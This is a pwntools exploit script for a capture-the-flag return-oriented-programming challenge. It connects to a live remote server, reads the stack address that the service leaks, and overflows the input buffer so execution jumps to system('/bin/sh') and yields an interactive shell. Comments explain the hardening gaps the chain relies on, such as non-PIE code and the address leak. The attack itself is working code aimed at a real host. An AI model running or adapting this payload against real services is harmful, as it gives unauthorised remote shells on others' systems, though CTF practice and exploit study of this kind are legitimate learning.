
Shell time!


Return Oriented Programming (ROP)

"""Exploit script for the "Shell time!" ROP challenge (pwntools).

Flow: connect, parse the buffer address the server prints in its banner,
then overflow the input buffer so the saved return address is replaced by
system@plt with a pointer to a "/bin/sh" string placed in the same buffer.

From a hardening point of view the script depends on two properties of the
target that a defender would remove: the PLT address is used with no base
adjustment (so the build is presumably non-PIE -- confirm with checksec),
and the service prints the address of its own stack buffer, which hands
out the stack location that ASLR was meant to hide.  A stack canary, PIE,
or simply not printing stack addresses would each break this chain.
"""
from pwn import *

# Load './server' as the target ELF so PLT addresses (elf.plt.system) resolve.
context.binary = './server'
elf = context.binary

# Live target; the commented-out line below runs the same script against a local copy.
p = remote('thekidofarcrania.com', 4902)
# p = process('./server')

# Read the banner up to the prompt.  The first whitespace-separated token of the
# 5th banner line (index 4) is the leaked buffer address the server prints itself.
s = p.recvuntil(b'Input some text: ')
# str(bytes)[2:-1] strips the "b'" / "'" wrapper, leaving a '0x...' text that int(addr, 16) accepts.
addr = str(s.split(b'\n')[4].split(b' ')[0])[2:-1] # starting address of buffer

# 60 bytes of junk (as in prev problem) + system address + 0 (exit) + address of "/bin/sh" string + "/bin/sh" string
# Layout: 60 (padding) + 4 (system@plt) + 4 (fake return address) + 4 (argument pointer) = 72 bytes,
# so b'/bin/sh' lands at buffer+72, exactly the pointer passed as system()'s argument.
# NOTE(review): the string carries no explicit NUL terminator; it presumably relies on a
# zero byte following it in memory -- not guaranteed, a trailing b'\x00' would be safer.
# The fake return address of 0 presumably makes the process fault after the shell exits,
# which a defender would see as a crash in the service logs.
payload = b'A'*60 + p32(elf.plt.system) + p32(0) + p32(int(addr, 16)+72) + b'/bin/sh'

p.sendline(payload)
p.interactive()